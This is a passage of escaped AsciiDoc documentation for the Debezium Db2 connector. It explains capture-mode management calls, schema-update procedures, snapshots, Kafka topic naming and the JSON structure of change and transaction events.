ASNCDC.ASNCDCSERVICES('status','asncdc');`\n\n|[[debezium-db2-put-capture-mode]]<<debezium-db2-put-capture-mode,Put a table into capture mode>>\n|`CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');` +\n +\nReplace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode.\n\n|[[debezium-db2-remove-capture-mode]]<<debezium-db2-remove-capture-mode,Remove a table from capture mode>>\n|`CALL ASNCDC.REMOVETABLE('MYSCHEMA', 'MYTABLE');`\n\n|[[debezium-db2-reinitialize-asn-service]]<<debezium-db2-reinitialize-asn-service,Reinitialize the ASN service>>\n|`VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');` +\n +\nDo this after you put a table into capture mode or after you remove a table from capture mode.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors\n\/\/ Title: Updating schemas for Db2 tables in capture mode for {prodname} connectors\n[[db2-schema-evolution]]\n== Schema evolution\n\nWhile a {prodname} Db2 connector can capture schema changes, to update a schema, you must collaborate with a database administrator to ensure that the connector continues to produce change events. This is required by the way that Db2 implements replication.\n\nFor each table in capture mode, Db2's replication feature creates a change-data table that contains all changes to that source table. However, change-data table schemas are static. If you update the schema for a table in capture mode then you must also update the schema of its corresponding change-data table. A {prodname} Db2 connector cannot do this. A database administrator with elevated privileges must update schemas for tables that are in capture mode.\n\n[WARNING]\n====\nIt is vital to execute a schema update procedure completely before there is a new schema update on the same table. Consequently, the recommendation is to execute all DDLs in a single batch so the schema update procedure is done only once.\n====\n\nThere are generally two procedures for updating table schemas:\n\n* {link-prefix}:{link-db2-connector}#db2-offline-schema-update[Offline - executed while {prodname} is stopped]\n* {link-prefix}:{link-db2-connector}#db2-online-schema-update[Online - executed while {prodname} is running]\n\nEach approach has advantages and disadvantages.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-offline-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing offline schema updates for {prodname} Db2 connectors\n[[db2-offline-schema-update]]\n=== Offline schema update\n\nYou stop the {prodname} Db2 connector before you perform an offline schema update. While this is the safer schema update procedure, it might not be feasible for applications with high-availability requirements.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure\n\n. Suspend the application that updates the database.\n. Wait for the {prodname} connector to stream all unstreamed change event records.\n. Stop the {prodname} connector.\n. Apply all changes to the source table schema.\n. In the ASN register table, mark the tables with updated schemas as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.\n. Remove the source table with the old schema from capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-remove-capture-mode[running the {prodname} UDF for removing tables from capture mode].\n. Add the source table with the new schema to capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-put-capture-mode[running the {prodname} UDF for adding tables to capture mode].\n. In the ASN register table, mark the updated source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Resume the application that updates the database.\n. Restart the {prodname} connector.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-online-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing online schema updates for {prodname} Db2 connectors\n[[db2-hot-schema-update]]\n=== Online schema update\n\nAn online schema update does not require application and data processing downtime. That is, you do not stop the {prodname} Db2 connector before you perform an online schema update. Also, an online schema update procedure is simpler than the procedure for an offline schema update.\n\nHowever, when a table is in capture mode, after a change to a column name, the Db2 replication feature continues to use the old column name. The new column name does not appear in {prodname} change events. You must restart the connector to see the new column name in change events.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure when adding a column to the end of a table\n\n. Lock the source tables whose schema you want to change.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Apply all changes to the schemas for the source tables.\n. Apply all changes to the schemas for the corresponding change-data tables.\n. In the ASN register table, mark the source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n\n.Procedure when adding a column to the middle of a table\n\n. Lock the source table(s) to be changed.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. For each source table to be changed:\n.. Export the data in the source table.\n.. Truncate the source table.\n.. Alter the source table and add the column.\n.. Load the exported data into the altered source table.\n.. Export the data in the source table's corresponding change-data table.\n.. Truncate the change-data table.\n.. Alter the change-data table and add the column.\n.. Load the exported data into the altered change-data table.\n. In the ASN register table, mark the tables as `INACTIVE`. This marks the old change-data tables as inactive, which allows the data in them to remain but they are no longer updated.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-db2\"]\n= {prodname} connector for Db2\n\n:context: db2\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n[NOTE]\n====\nThis connector is in an incubating state. Exact semantics, configuration options and other features may change in future revisions, based on the feedback we receive. Please let us know if you encounter any problems.\n====\nendif::community[]\n\n\nifdef::product[]\n[IMPORTANT]\n====\nThe {prodname} Db2 connector is a Technology Preview feature. Technology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete; therefore, Red Hat does not recommend implementing any Technology Preview features in production environments. This Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process. For more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\n\n{prodname}'s Db2 connector can capture row-level changes in the tables of a Db2 database. This connector is strongly inspired by the {prodname} implementation of SQL Server, which uses a SQL-based polling model that puts tables into \"capture mode\". When a table is in capture mode, the {prodname} Db2 connector generates and streams a change event for each row-level update to that table.\n\nA table that is in capture mode has an associated change-data table, which Db2 creates. For each change to a table that is in capture mode, Db2 adds data about that change to the table's associated change-data table. A change-data table contains an entry for each state of a row. It also has special entries for deletions. The {prodname} Db2 connector reads change events from change-data tables and emits the events to Kafka topics.\n\nThe first time a {prodname} Db2 connector connects to a Db2 database, the connector reads a consistent snapshot of the tables for which the connector is configured to capture changes. By default, this is all non-system tables. There are connector configuration properties that let you specify which tables to put into capture mode, or which tables to exclude from capture mode.\n\nWhen the snapshot is complete the connector begins emitting change events for committed updates to tables that are in capture mode. By default, change events for a particular table go to a Kafka topic that has the same name as the table. Applications and services consume change events from these topics.\n\nThe connector uses the abstract syntax notation (ASN) libraries that come as a standard part of Db2 LUW (Db2 for Linux, UNIX and Windows) and which you can add to Db2 zOS. To use ASN and hence this connector, you must have a license for the IBM InfoSphere Data Replication (IIDR) product. However, IIDR does not need to be installed.\n\nThe Db2 connector has been tested with Db2\/Linux {linux-version}. It is expected that the connector would also work on Windows, AIX and zOS.\n\nifdef::product[]\nInformation and procedures for using a {prodname} Db2 connector is organized as follows:\n\n* xref:overview-of-debezium-db2-connector[]\n* xref:how-debezium-db2-connectors-work[]\n* xref:descriptions-of-debezium-db2-connector-data-change-events[]\n* xref:how-debezium-db2-connectors-map-data-types[]\n* xref:setting-up-db2-to-run-a-debezium-connector[]\n* xref:deploying-debezium-db2-connectors[]\n* xref:monitoring-debezium-db2-connector-performance[]\n* xref:managing-debezium-db2-connectors[]\n* xref:updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Db2 connector\n\/\/ ModuleID: overview-of-debezium-db2-connector\n[[db2-overview]]\n== Overview\n\nThe {prodname} Db2 connector is based on the link:https:\/\/www.ibm.com\/support\/pages\/q-replication-and-sql-replication-product-documentation-pdf-format-version-101-linux-unix-and-windows[ASN Capture\/Apply agents]\nthat enable SQL Replication in Db2. A capture agent:\n\n* Generates change-data tables for tables that are in capture mode.\n* Monitors tables in capture mode and stores change events for updates to those tables in their corresponding change-data tables.\n\nThe {prodname} connector uses a SQL interface to query change-data tables for change events.\n\nThe database administrator must put the tables for which you want to capture changes into capture mode. For convenience and for automating testing, there are {link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[{prodname} user-defined functions (UDFs)] in C that you can compile and then use to do the following management tasks:\n\n* Start, stop, and reinitialize the ASN agent\n* Put tables into capture mode\n* Create the replication (ASN) schemas and change-data tables\n* Remove tables from capture mode\n\nAlternatively, you can use Db2 control commands to accomplish these tasks.\n\nAfter the tables of interest are in capture mode, the connector reads their corresponding change-data tables to obtain change events for table updates. The connector emits a change event for each row-level insert, update, and delete operation to a Kafka topic that has the same name as the changed table. This is default behavior that you can modify. Client applications read the Kafka topics that correspond to the database tables of interest and can react to each row-level change event.\n\nTypically, the database administrator puts a table into capture mode in the middle of the life of a table. This means that the connector does not have the complete history of all changes that have been made to the table. Therefore, when the Db2 connector first connects to a particular Db2 database, it starts by performing a _consistent snapshot_ of each table that is in capture mode. After the connector completes the snapshot, the connector streams change events from the point at which the snapshot was made. In this way, the connector starts with a consistent view of the tables that are in capture mode, and does not drop any changes that were made while it was performing the snapshot.\n\n{prodname} connectors are tolerant of failures. As the connector reads and produces change events, it records the log sequence number (LSN) of the change-data table entry. The LSN is the position of the change event in the database log. If the connector stops for any reason, including communication failures, network problems, or crashes, upon restarting it continues reading the change-data tables where it left off. This includes snapshots. That is, if the snapshot was not complete when the connector stopped, upon restart the connector begins a new snapshot.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-db2-connectors-work\n\/\/ Title: How {prodname} Db2 connectors work\n[[how-the-db2-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Db2 connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and handles schema changes.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-db2-connectors-perform-database-snapshots[]\n* xref:how-debezium-db2-connectors-read-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-db2-change-event-records[]\n* xref:about-the-debezium-db2-connector-schema-change-topic[]\n* xref:debezium-db2-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-db2-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} Db2 connectors perform database snapshots\n[[db2-snapshots]]\n=== Snapshots\n\nDb2`s replication feature is not designed to store the complete history of database changes. Consequently, when a {prodname} Db2 connector connects to a database for the first time, it takes a consistent snapshot of tables that are in capture mode and streams this state to Kafka. This establishes the baseline for table content.\n\nBy default, when a Db2 connector performs a snapshot, it does the following:\n\n. Determines which tables are in capture mode, and thus must be included in the snapshot. By default, all non-system tables are in capture mode. Connector configuration properties, such as `table.exclude.list` and `table.include.list` let you specify which tables should be in capture mode.\n. Obtains a lock on each of the tables in capture mode. This ensures that no schema changes can occur in those tables during the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` connector configuration property.\n. Reads the highest (most recent) LSN position in the server's transaction log.\n. Captures the schema of all tables that are in capture mode. The connector persists this information in its internal database history topic.\n. Optional, releases the locks obtained in step 2. Typically, these locks are held for only a short time.\n. At the LSN position read in step 3, the connector scans the capture mode tables as well as their schemas. During the scan, the connector:\n.. Confirms that the table was created before the start of the snapshot. If it was not, the snapshot skips that table. After the snapshot is complete, and the connector starts emitting change events, the connector produces change events for any tables that were created during the snapshot.\n.. Produces a _read_ event for each row in each table that is in capture mode. All _read_ events contain the same LSN position, which is the LSN position that was obtained in step 3.\n.. Emits each _read_ event to the Kafka topic that has the same name as the table.\n. Records the successful completion of the snapshot in the connector offsets.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} Db2 connectors read change-data tables\n[id=\"how-debezium-db2-connectors-read-change-data-tables\"]\n=== Change-data tables\n\nAfter a complete snapshot, when a {prodname} Db2 connector starts for the first time, the connector identifies the change-data table for each source table that is in capture mode. The connector does the following for each change-data table:\n\n. Reads change events that were created between the last stored, highest LSN and the current, highest LSN.\n. Orders the change events according to the commit LSN and the change LSN for each event. This ensures that the connector emits the change events in the order in which the table changes occurred.\n. Passes commit and change LSNs as offsets to Kafka Connect.\n. Stores the highest LSN that the connector passed to Kafka Connect.\n\nAfter a restart, the connector resumes emitting change events from the offset (commit and change LSNs) where it left off. While the connector is running and emitting change events, if you remove a table from capture mode or add a table to capture mode, the connector detects this and modifies its behavior accordingly.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-db2-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Db2 change event records\n[[db2-topic-names]]\n=== Topic names\n\nBy default, the Db2 connector writes change events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic has the following format:\n\n_databaseName_._schemaName_._tableName_\n\n_databaseName_:: The logical name of the connector as specified with the `database.server.name` connector configuration property.\n\n_schemaName_:: The name of the schema in which the operation occurred.\n\n_tableName_:: The name of the table in which the operation occurred.\n\nFor example, consider a Db2 installation with the `mydatabase` database, which contains four tables: `PRODUCTS`, `PRODUCTS_ON_HAND`, `CUSTOMERS`, and `ORDERS` that are in the `MYSCHEMA` schema. The connector would emit events to these four Kafka topics:\n\n* `mydatabase.MYSCHEMA.PRODUCTS`\n* `mydatabase.MYSCHEMA.PRODUCTS_ON_HAND`\n* `mydatabase.MYSCHEMA.CUSTOMERS`\n* `mydatabase.MYSCHEMA.ORDERS`\n\nTo configure a Db2 connector to emit change events to differently-named Kafka topics, see the documentation for the {link-prefix}:{link-topic-routing}#topic-routing[topic routing transformation].\n\n\/\/ Type: concept\n\/\/ Title: About the {prodname} Db2 connector schema change topic\n[id=\"about-the-debezium-db2-connector-schema-change-topic\"]\n=== Schema change topic\n\nFor a table that is in capture mode, the {prodname} Db2 connector stores the history of schema changes to that table in a database history topic. This topic reflects an internal connector state and you should not use it. If your application needs to track schema changes, there is a public schema change topic. The name of the schema change topic is the same as the logical server name specified in the connector configuration.\n\n[WARNING]\n====\nThe format of messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when:\n\n* A new table goes into capture mode.\n* A table is removed from capture mode.\n* During a {link-prefix}:{link-db2-connector}#db2-schema-evolution[database schema update], there is a change in the schema for a table that is in capture mode.\n\nA message to the schema change topic contains a logical representation of the table schema, for example:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"db2\",\n \"ts_ms\": 1588252618953,\n \"snapshot\": \"true\",\n \"db\": \"testdb\",\n \"schema\": \"DB2INST1\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"databaseName\": \"TESTDB\", \/\/ <1>\n \"schemaName\": \"DB2INST1\",\n \"ddl\": null, \/\/ <2>\n \"tableChanges\": [ \/\/ <3>\n {\n \"type\": \"CREATE\", \/\/ <4>\n \"id\": \"\\\"DB2INST1\\\".\\\"CUSTOMERS\\\"\", \/\/ <5>\n \"table\": { \/\/ <6>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <7>\n \"ID\"\n ],\n \"columns\": [ \/\/ <8>\n {\n \"name\": \"ID\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"FIRST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"LAST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"EMAIL\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,3,6\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|2\n|`ddl`\n|Always `null` for the Db2 connector. For other connectors, this field contains the DDL responsible for the schema change. This DDL is not available to Db2 connectors.\n\n|3\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|4\n|`type`\na|Describes the kind of change. The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|5\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|6\n|`table`\n|Represents table metadata after the applied change.\n\n|7\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|8\n|`columns`\n|Metadata for each column in the changed table.\n\n|===\n\nIn messages to the schema change topic, the key is the name of the database that contains the schema change. In the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"TESTDB\"\n }\n}\n----\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} Db2 connector-generated events that represent transaction boundaries\n[[db2-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich change data event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from the given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nThe connector emits transaction events to the `_database.server.name_.transaction` topic.\n\n.Data change event enrichment\n\nWhen transaction metadata is enabled the connector enriches the change event `Envelope` with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Db2 connector data change events\n[[db2-events]]\n== Data change events\n\nThe {prodname} Db2 connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-db2-connector}#db2-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-db2-connector}#db2-topic-names[topic names].\n\n[WARNING]\n====\nThe {prodname} Db2 connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n\nAlso, Db2 names for databases, schemas, and tables can be case sensitive. This means that the connector could emit event records for more than one table to the same Kafka topic.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-db2-change-events[]\n* xref:about-values-in-debezium-db2-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-db2-change-events\n\/\/ Title: About keys in {prodname} db2 change events\n[[db2-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"ID\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`mydatabase.MYSCHEMA.CUSTOMERS.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `mydatabase` is the name of the connector that generated this event. +\n* `MYSCHEMA` is the database schema that contains the table that was changed. +\n* `CUSTOMERS` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `ID` field whose value is `1004`.\n\n|===\n\n\/\/\/\/\n[NOTE]\n====\nAlthough the `column.exclude.list` connector configuration property allows you to omit columns from event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\/\/\/\/\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-db2-change-events\n\/\/ Title: About values in {prodname} Db2 change events\n[[db2-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe event value portion of every change event for the `customers` table specifies the same schema. The event value's payload varies according to the event type:\n\n* <<db2-create-events,_create_ events>>\n* <<db2-update-events,_update_ events>>\n* <<db2-delete-events,_delete_ events>>\n\n[[db2-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n 